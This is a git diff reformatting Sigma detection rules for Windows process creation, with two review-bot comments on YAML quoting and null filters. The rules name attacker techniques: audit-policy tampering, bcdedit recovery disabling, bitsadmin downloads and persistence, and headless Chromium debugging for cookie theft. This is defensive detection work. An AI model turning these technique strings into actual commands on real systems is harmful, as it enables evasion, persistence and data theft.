@@ -1,11 +1,10 @@ title: Set Files as System Files Using Attrib.EXE id: bb19e94c-59ae-4c15-8c12-c563d23fe52b related: - - id: efec536f-72e8-4656-8960-5e85d091345b - type: similar + - id: efec536f-72e8-4656-8960-5e85d091345b + type: similar status: experimental -description: Detects the execution of "attrib" with the "+s" flag to mark files as - system files +description: Detects the execution of "attrib" with the "+s" flag to mark files as system files references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib @@ -25,10 +24,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \attrib.exe - - OriginalFileName: ATTRIB.EXE + - Image|endswith: \attrib.exe + - OriginalFileName: ATTRIB.EXE selection_cli: - CommandLine|contains: ' +s ' + CommandLine|contains: ' +s ' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_attrib_system_susp_paths.yml b/sigma/sysmon/process_creation/proc_creation_win_attrib_system_susp_paths.yml index 1deb89e32..a3636c287 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_attrib_system_susp_paths.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_attrib_system_susp_paths.yml 
@@ -1,15 +1,11 @@ title: Set Suspicious Files as System Files Using Attrib.EXE id: efec536f-72e8-4656-8960-5e85d091345b related: - - id: bb19e94c-59ae-4c15-8c12-c563d23fe52b - type: derived + - id: bb19e94c-59ae-4c15-8c12-c563d23fe52b + type: derived status: experimental -description: 'Detects the usage of attrib with the "+s" option to set scripts or executables - located in suspicious locations as system files to hide them from users and make - them unable to be deleted with simple rights. The rule limits the search to specific - extensions and directories to avoid FPs - - ' +description: | + Detects the usage of attrib with the "+s" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs references: - https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4 - https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0 @@ -29,20 +25,20 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \attrib.exe - - OriginalFileName: ATTRIB.EXE + - Image|endswith: \attrib.exe + - OriginalFileName: ATTRIB.EXE selection_cli: - CommandLine|contains: ' +s' + CommandLine|contains: ' +s' selection_paths: - CommandLine|contains: - - ' %' + CommandLine|contains: + - ' %' # Custom Environment variable - \Users\Public\ - \AppData\Local\ - \ProgramData\ - \Downloads\ - \Windows\Temp\ selection_ext: - CommandLine|contains: + CommandLine|contains: - .bat - .dll - .exe @@ -51,7 +47,7 @@ detection: - .vbe - .vbs filter: - CommandLine|contains|all: + CommandLine|contains|all: - \Windows\TEMP\ - .exe condition: process_creation and (all of selection* and not filter) 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_auditpol_nt_resource_kit_usage.yml b/sigma/sysmon/process_creation/proc_creation_win_auditpol_nt_resource_kit_usage.yml index ac3338bf4..161628e6f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_auditpol_nt_resource_kit_usage.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_auditpol_nt_resource_kit_usage.yml @@ -1,17 +1,12 @@ title: Audit Policy Tampering Via NT Resource Kit Auditpol id: c6c56ada-612b-42d1-9a29-adad3c5c2c1e related: - - id: 0a13e132-651d-11eb-ae93-0242ac130002 - type: similar + - id: 0a13e132-651d-11eb-ae93-0242ac130002 # New auditpol version + type: similar status: test -description: 'Threat actors can use an older version of the auditpol binary available - inside the NT resource kit to change audit policy configuration to impair detection - capability. - - This can be carried out by selectively disabling/removing certain audit policies - as well as restoring a custom policy owned by the threat actor. - - ' +description: | + Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability. + This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor. references: - https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Windows%202000%20Resource%20Kit%20Tools/AuditPol author: Nasreddine Bencherchali (Nextron Systems) @@ -29,7 +24,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - /logon:none - /system:none - /sam:none 
@@ -39,8 +34,6 @@ detection: - /policy:none condition: process_creation and selection falsepositives: - - The old auditpol utility isn't available by default on recent versions of Windows - as it was replaced by a newer version. The FP rate should be very low except - for tools that use a similar flag structure + - The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_auditpol_susp_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_auditpol_susp_execution.yml index bb5b73274..2797ee99f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_auditpol_susp_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_auditpol_susp_execution.yml @@ -1,16 +1,12 @@ title: Audit Policy Tampering Via Auditpol id: 0a13e132-651d-11eb-ae93-0242ac130002 related: - - id: c6c56ada-612b-42d1-9a29-adad3c5c2c1e - type: similar + - id: c6c56ada-612b-42d1-9a29-adad3c5c2c1e # Old auditpol + type: similar status: test -description: 'Threat actors can use auditpol binary to change audit policy configuration - to impair detection capability. - - This can be carried out by selectively disabling/removing certain audit policies - as well as restoring a custom policy owned by the threat actor. - - ' +description: | + Threat actors can use auditpol binary to change audit policy configuration to impair detection capability. + This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor. references: - https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/ author: Janantha Marasinghe (https://github.com/blueteam0ps) 
@@ -28,17 +24,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \auditpol.exe - - OriginalFileName: AUDITPOL.EXE + - Image|endswith: \auditpol.exe + - OriginalFileName: AUDITPOL.EXE selection_cli: - CommandLine|contains: - - disable - - clear - - remove - - restore + CommandLine|contains: + - disable # disables a specific audit policy + - clear # delete or clears audit policy + - remove # removes an audit policy + - restore # restores an audit policy condition: process_creation and (all of selection_*) falsepositives: - - Administrator or administrator scripts might leverage the flags mentioned in - the detection section. Either way, it should always be monitored + - Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_bash_command_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_bash_command_execution.yml index 38747f9dc..58e9a8705 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_bash_command_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_bash_command_execution.yml @@ -1,9 +1,7 @@ title: Indirect Inline Command Execution Via Bash.EXE id: 5edc2273-c26f-406c-83f3-f4d948e740dd status: experimental -description: Detects execution of Microsoft bash launcher with the "-c" flag. This - can be used to potentially bypass defenses and execute Linux or Windows-based - binaries directly via bash +description: Detects execution of Microsoft bash launcher with the "-c" flag. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash references: - https://lolbas-project.github.io/lolbas/Binaries/Bash/ author: frack113 
@@ -21,12 +19,12 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith:
- - :\Windows\System32\bash.exe
- - :\Windows\SysWOW64\bash.exe
- - OriginalFileName: Bash.exe
+ - Image|endswith:
+ - :\Windows\System32\bash.exe
+ - :\Windows\SysWOW64\bash.exe
+ - OriginalFileName: Bash.exe
 selection_cli:
- CommandLine|contains: ' -c '
+ CommandLine|contains: ' -c '
 condition: process_creation and (all of selection_*)
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_bash_file_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_bash_file_execution.yml
index e67f66734..11d0716ea 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_bash_file_execution.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_bash_file_execution.yml
@@ -1,12 +1,10 @@
 title: Indirect Command Execution From Script File Via Bash.EXE
 id: 2d22a514-e024-4428-9dba-41505bd63a5b
 related:
- - id: 5edc2273-c26f-406c-83f3-f4d948e740dd
- type: similar
+ - id: 5edc2273-c26f-406c-83f3-f4d948e740dd
+ type: similar
 status: experimental
-description: Detects execution of Microsoft bash launcher without any flags to execute
- the content of a bash script directly. This can be used to potentially bypass
- defenses and execute Linux or Windows-based binaries directly via bash
+description: Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash
 references:
 - https://lolbas-project.github.io/lolbas/Binaries/Bash/
 - https://linux.die.net/man/1/bash
@@ -25,20 +23,21 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- - Image|endswith:
- - :\Windows\System32\bash.exe
- - :\Windows\SysWOW64\bash.exe
- - OriginalFileName: Bash.exe
+ - Image|endswith:
+ - :\Windows\System32\bash.exe
+ - :\Windows\SysWOW64\bash.exe
+ - OriginalFileName: Bash.exe
 filter_main_cli_flag:
- CommandLine|contains:
+ CommandLine|contains:
+ # Note: we're not interested in flags being passed first
 - bash.exe -
 - bash -
 filter_main_no_cli:
- CommandLine: null
+ CommandLine:
 filter_main_empty:
- CommandLine: ''
+ CommandLine: ''
 filter_main_no_flag:
- CommandLine:
+ CommandLine:
 - bash.exe
 - bash
 condition: process_creation and (selection and not 1 of filter_main_*)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml b/sigma/sysmon/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml
index c29f1e981..97129c541 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml
@@ -1,9 +1,7 @@
 title: Boot Configuration Tampering Via Bcdedit.EXE
 id: 1444443e-6757-43e4-9ea4-c8fc705f79a2
 status: stable
-description: Detects the use of the bcdedit command to tamper with the boot configuration
- data. This technique is often times used by malware or attackers as a destructive
- way before launching ransomware.
+description: Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md
 - https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html
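Review bot: Replacing `- CommandLine: null` with the bare `+ CommandLine:` in `filter_main_no_cli` parses to the same null value, but it now reads like an unfinished key and sits right next to `filter_main_empty`, whose `CommandLine: ''` looks almost identical at a glance even though the two filters match different things. Since this hunk already adds an explanatory comment to `filter_main_cli_flag`, giving this filter the same treatment would preserve the intent the explicit `null` carried: `CommandLine: # null: matches events with no CommandLine field at all`. The enclosing `detection:` block starts before this hunk.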
@@ -22,17 +20,17 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \bcdedit.exe
- - OriginalFileName: bcdedit.exe
+ - Image|endswith: \bcdedit.exe
+ - OriginalFileName: bcdedit.exe
 selection_set:
- CommandLine|contains: set
+ CommandLine|contains: set
 selection_cli:
- - CommandLine|contains|all:
- - bootstatuspolicy
- - ignoreallfailures
- - CommandLine|contains|all:
- - recoveryenabled
- - 'no'
+ - CommandLine|contains|all:
+ - bootstatuspolicy
+ - ignoreallfailures
+ - CommandLine|contains|all:
+ - recoveryenabled
+ - no
 condition: process_creation and (all of selection_*)
 fields:
 - ComputerName
diff --git a/sigma/sysmon/process_creation/proc_creation_win_bcdedit_susp_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_bcdedit_susp_execution.yml
index f84b65be7..573ad88a2 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_bcdedit_susp_execution.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_bcdedit_susp_execution.yml
@@ -22,10 +22,10 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \bcdedit.exe
- - OriginalFileName: bcdedit.exe
+ - Image|endswith: \bcdedit.exe
+ - OriginalFileName: bcdedit.exe
 selection_cli:
- CommandLine|contains:
+ CommandLine|contains:
 - delete
 - deletevalue
 - import
diff --git a/sigma/sysmon/process_creation/proc_creation_win_bginfo_suspicious_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_bginfo_suspicious_child_process.yml
index f5dd2a475..5ff872b83 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_bginfo_suspicious_child_process.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_bginfo_suspicious_child_process.yml
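Review bot: Dropping the quotes in `+ - no` under the second `CommandLine|contains|all` branch of `selection_cli` is not a pure formatting change: YAML 1.1 loaders (PyYAML among them) resolve a bare `no` to the boolean false, so the value handed to the backend for the `recoveryenabled` pattern can become `False` instead of the string `no`, and that branch would silently stop matching. Whether this bites depends on which YAML parser consumes the converted rule, but the quoted form is unambiguous across parsers and costs nothing, so keep it as `- 'no'`, which is how the removed line had it. The same check is worth running over the rest of this reformat for any other YAML 1.1 boolean-like scalar (`yes`, `on`, `off`) that lost its quotes.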
@@ -1,11 +1,10 @@
 title: Suspicious Child Process Of BgInfo.EXE
 id: 811f459f-9231-45d4-959a-0266c6311987
 related:
- - id: aaf46cdc-934e-4284-b329-34aa701e3771
- type: similar
+ - id: aaf46cdc-934e-4284-b329-34aa701e3771
+ type: similar
 status: experimental
-description: Detects suspicious child processes of "BgInfo.exe" which could be a sign
- of potential abuse of the binary to proxy execution via external VBScript
+description: Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
 references:
 - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/
 - https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
@@ -30,22 +29,22 @@ detection:
 - \bginfo.exe
 - \bginfo64.exe
 selection_child:
- - Image|endswith:
- - \calc.exe
- - \cmd.exe
- - \cscript.exe
- - \mshta.exe
- - \notepad.exe
- - \powershell.exe
- - \pwsh.exe
- - \wscript.exe
- - Image|contains:
- - \AppData\Local\
- - \AppData\Roaming\
- - :\Users\Public\
- - :\Temp\
- - :\Windows\Temp\
- - :\PerfLogs\
+ - Image|endswith:
+ - \calc.exe
+ - \cmd.exe
+ - \cscript.exe
+ - \mshta.exe
+ - \notepad.exe
+ - \powershell.exe
+ - \pwsh.exe
+ - \wscript.exe
+ - Image|contains:
+ - \AppData\Local\
+ - \AppData\Roaming\
+ - :\Users\Public\
+ - :\Temp\
+ - :\Windows\Temp\
+ - :\PerfLogs\
 condition: process_creation and (all of selection_*)
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_bginfo_uncommon_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_bginfo_uncommon_child_process.yml
index 00a52530a..d00abc4bb 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_bginfo_uncommon_child_process.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_bginfo_uncommon_child_process.yml
@@ -1,11 +1,10 @@
 title: Uncommon Child Process Of BgInfo.EXE
 id: aaf46cdc-934e-4284-b329-34aa701e3771
 related:
- - id: 811f459f-9231-45d4-959a-0266c6311987
- type: similar
+ - id: 811f459f-9231-45d4-959a-0266c6311987
+ type: similar
 status: test
-description: Detects uncommon child processes of "BgInfo.exe" which could be a sign
- of potential abuse of the binary to proxy execution via external VBScript
+description: Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
 references:
 - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/
 - https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
diff --git a/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download.yml b/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download.yml
index 5a3e62976..e0eba4cee 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download.yml
@@ -24,16 +24,16 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \bitsadmin.exe
- - OriginalFileName: bitsadmin.exe
+ - Image|endswith: \bitsadmin.exe
+ - OriginalFileName: bitsadmin.exe
 selection_cmd:
- CommandLine|contains: ' /transfer '
+ CommandLine|contains: ' /transfer '
 selection_cli_1:
- CommandLine|contains:
+ CommandLine|contains:
 - ' /create '
 - ' /addfile '
 selection_cli_2:
- CommandLine|contains: http
+ CommandLine|contains: http
 condition: process_creation and (selection_img and (selection_cmd or all of selection_cli_*))
 fields:
 - CommandLine
diff --git a/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_direct_ip.yml b/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_direct_ip.yml
index 31fe92689..17bace29f 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_direct_ip.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_direct_ip.yml
@@ -1,11 +1,10 @@
 title: Suspicious Download From Direct IP Via Bitsadmin
 id: 99c840f2-2012-46fd-9141-c761987550ef
 related:
- - id: 90f138c1-f578-4ac3-8c49-eecfd847c8b7
- type: similar
+ - id: 90f138c1-f578-4ac3-8c49-eecfd847c8b7
+ type: similar
 status: test
-description: Detects usage of bitsadmin downloading a file using an URL that contains
- an IP
+description: Detects usage of bitsadmin downloading a file using an URL that contains an IP
 references:
 - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin
 - https://isc.sans.edu/diary/22264
@@ -29,15 +28,15 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \bitsadmin.exe
- - OriginalFileName: bitsadmin.exe
+ - Image|endswith: \bitsadmin.exe
+ - OriginalFileName: bitsadmin.exe
 selection_flags:
- CommandLine|contains:
+ CommandLine|contains:
 - ' /transfer '
 - ' /create '
 - ' /addfile '
 selection_extension:
- CommandLine|contains:
+ CommandLine|contains:
 - ://1
 - ://2
 - ://3
@@ -48,7 +47,7 @@ detection:
 - ://8
 - ://9
 filter_seven_zip:
- CommandLine|contains: ://7-
+ CommandLine|contains: ://7- # For https://7-zip.org/
 condition: process_creation and (all of selection_* and not 1 of filter_*)
 fields:
 - CommandLine
diff --git a/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml b/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml
index c6bdaf8cc..c2563efd3 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml
@@ -26,16 +26,16 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \bitsadmin.exe
- - OriginalFileName: bitsadmin.exe
+ - Image|endswith: \bitsadmin.exe
+ - OriginalFileName: bitsadmin.exe
 selection_flags:
- CommandLine|contains:
+ CommandLine|contains:
 - ' /transfer '
 - ' /create '
 - ' /addfile '
 selection_domain:
- CommandLine|contains:
- - .githubusercontent.com
+ CommandLine|contains:
+ - .githubusercontent.com # Includes both gists and github repositories / Michael Haag (idea)
 - anonfiles.com
 - cdn.discordapp.com
 - cdn.discordapp.com/attachments/
diff --git a/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_susp_extensions.yml b/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_susp_extensions.yml
index e8d7ea08a..f39f1ebdc 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_susp_extensions.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_susp_extensions.yml
@@ -24,15 +24,15 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \bitsadmin.exe
- - OriginalFileName: bitsadmin.exe
+ - Image|endswith: \bitsadmin.exe
+ - OriginalFileName: bitsadmin.exe
 selection_flags:
- CommandLine|contains:
+ CommandLine|contains:
 - ' /transfer '
 - ' /create '
 - ' /addfile '
 selection_extension:
- CommandLine|contains:
+ CommandLine|contains:
 - .7z
 - .asax
 - .ashx
diff --git a/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml b/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml
index 432616ce4..2881db31e 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml
@@ -1,8 +1,7 @@
 title: File Download Via Bitsadmin To A Suspicious Target Folder
 id: 2ddef153-167b-4e89-86b6-757a9e65dcac
 status: experimental
-description: Detects usage of bitsadmin downloading a file to a suspicious target
- folder
+description: Detects usage of bitsadmin downloading a file to a suspicious target folder
 references:
 - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin
 - https://isc.sans.edu/diary/22264
@@ -26,15 +25,15 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \bitsadmin.exe
- - OriginalFileName: bitsadmin.exe
+ - Image|endswith: \bitsadmin.exe
+ - OriginalFileName: bitsadmin.exe
 selection_flags:
- CommandLine|contains:
+ CommandLine|contains:
 - ' /transfer '
 - ' /create '
 - ' /addfile '
 selection_folder:
- CommandLine|contains:
+ CommandLine|contains:
 - :\Perflogs
 - :\ProgramData\
 - :\Temp\
diff --git a/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml b/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml
index e994db5bb..e972f85a8 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml
@@ -25,15 +25,15 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_img:
- - Image|endswith: \bitsadmin.exe
- - OriginalFileName: bitsadmin.exe
+ - Image|endswith: \bitsadmin.exe
+ - OriginalFileName: bitsadmin.exe
 selection_flags:
- CommandLine|contains:
+ CommandLine|contains:
 - ' /transfer '
 - ' /create '
 - ' /addfile '
 selection_folder:
- CommandLine|contains:
+ CommandLine|contains:
 - '%AppData%'
 - '%temp%'
 - '%tmp%'
diff --git a/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml b/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml
index faee4b074..5b7e6a1c4 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml
@@ -1,12 +1,7 @@
 title: Monitoring For Persistence Via BITS
 id: b9cbbc17-d00d-4e3d-a827-b06d03d2380d
 status: test
-description: BITS will allow you to schedule a command to execute after a successful
- download to notify you that the job is finished. When the job runs on the system
- the command specified in the BITS job will be executed. This can be abused by
- actors to create a backdoor within the system and for persistence. It will be
- chained in a BITS job to schedule the download of malware/additional binaries
- and execute the program after being downloaded
+description: BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded
 references:
 - https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
 - http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html
@@ -26,18 +21,18 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_1:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - bitsadmin
 - /SetNotifyCmdLine
- CommandLine|contains:
+ CommandLine|contains:
 - '%COMSPEC%'
 - cmd.exe
 - regsvr32.exe
 selection_2:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - bitsadmin
 - /Addfile
- CommandLine|contains:
+ CommandLine|contains:
 - 'http:'
 - 'https:'
 - 'ftp:'
diff --git a/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml b/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml
index 9c465c92e..d93888188 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml
@@ -1,12 +1,10 @@
 title: Potential Data Stealing Via Chromium Headless Debugging
 id: 3e8207c5-fcd2-4ea6-9418-15d45b4890e4
 related:
- - id: b3d34dc5-2efd-4ae3-845f-8ec14921f449
- type: derived
+ - id: b3d34dc5-2efd-4ae3-845f-8ec14921f449
+ type: derived
 status: test
-description: Detects chromium based browsers starting in headless and debugging mode
- and pointing to a user profile. This could be a sign of data stealing or remote
- control
+description: Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control
 references:
 - https://github.com/defaultnamehere/cookie_crimes/
 - https://mango.pdf.zone/stealing-chrome-cookies-without-a-password
@@ -26,8 +24,8 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- CommandLine|contains|all:
- - --remote-debugging-
+ CommandLine|contains|all:
+ - --remote-debugging- # Covers: --remote-debugging-address, --remote-debugging-port, --remote-debugging-socket-name, --remote-debugging-pipe....etc
 - --user-data-dir
 - --headless
 condition: process_creation and selection
diff --git a/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_headless_exec.yml b/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_headless_exec.yml
index 7cfcea6fa..8ab64bbbc 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_headless_exec.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_headless_exec.yml
@@ -1,8 +1,8 @@
 title: Browser Execution In Headless Mode
 id: ef9dcfed-690c-4c5d-a9d1-482cd422225c
 related:
- - id: 0e8cfe08-02c9-4815-a2f8-0d157b7ed33e
- type: derived
+ - id: 0e8cfe08-02c9-4815-a2f8-0d157b7ed33e
+ type: derived
 status: test
 description: Detects execution of Chromium based browser in headless mode
 references:
@@ -28,7 +28,7 @@ detection:
 - \msedge.exe
 - \opera.exe
 - \vivaldi.exe
- CommandLine|contains: --headless
+ CommandLine|contains: --headless
 condition: process_creation and selection
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml b/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml
index ed14c0d6d..4f3a5ad4e 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml
@@ -1,11 +1,10 @@
 title: File Download with Headless Browser
 id: 0e8cfe08-02c9-4815-a2f8-0d157b7ed33e
 related:
- - id: ef9dcfed-690c-4c5d-a9d1-482cd422225c
- type: derived
+ - id: ef9dcfed-690c-4c5d-a9d1-482cd422225c
+ type: derived
 status: test
-description: Detects execution of chromium based browser in headless mode using the
- "dump-dom" command line to download files
+description: Detects execution of chromium based browser in headless mode using the "dump-dom" command line to download files
 references:
 - https://twitter.com/mrd0x/status/1478234484881436672?s=12
 - https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html
@@ -30,7 +29,7 @@ detection:
 - \msedge.exe
 - \opera.exe
 - \vivaldi.exe
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - --headless
 - dump-dom
 - http
diff --git a/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_load_extension.yml b/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_load_extension.yml
index 85fa4bb34..4464d85da 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_load_extension.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_browsers_chromium_load_extension.yml
@@ -1,11 +1,10 @@
 title: Chromium Browser Instance Executed With Custom Extension
 id: 88d6e60c-759d-4ac1-a447-c0f1466c2d21
 related:
- - id: 27ba3207-dd30-4812-abbf-5d20c57d474e
- type: similar
+ - id: 27ba3207-dd30-4812-abbf-5d20c57d474e
+ type: similar
 status: experimental
-description: Detects a Chromium based browser process with the 'load-extension' flag
- to start a instance with a custom extension
+description: Detects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension
 references:
 - https://redcanary.com/blog/chromeloader/
 - https://emkc.org/s/RJjuLa
@@ -31,10 +30,9 @@ detection:
 - \msedge.exe
 - \opera.exe
 - \vivaldi.exe
- CommandLine|contains: --load-extension=
+ CommandLine|contains: --load-extension=
 condition: process_creation and selection
 falsepositives:
- - Usage of Chrome Extensions in testing tools such as BurpSuite will trigger this
- alert
+ - Usage of Chrome Extensions in testing tools such as BurpSuite will trigger this alert
 level: medium
 ruletype: Sigma
